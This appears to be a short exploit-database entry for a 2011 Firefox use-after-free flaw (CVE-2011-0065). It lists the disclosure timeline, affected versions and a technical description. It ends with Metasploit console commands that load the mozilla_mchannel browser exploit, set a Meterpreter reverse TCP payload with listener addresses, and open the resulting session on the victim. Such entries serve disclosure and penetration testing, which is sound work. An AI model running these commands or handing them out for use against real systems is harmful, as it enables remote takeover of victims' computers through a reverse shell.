Timeline :
Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2011-02-17
Coordinated public release of the vulnerability the 2011-04-28
Metasploit PoC provided the 2011-08-10
PoC provided by :
regenrecht
Rh0
Reference(s) :
CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13
Affected version(s) :
Firefox 3.6.17 and bellow
Firefox 3.5.19 and bellow
Seamonkey 2.0.14 and bellow
Tested on Windows XP SP3 with :
Mozilla Firefox 3.6.16
Description :
This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3.
Commands :
use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
getuid
sysinfo
ipconfig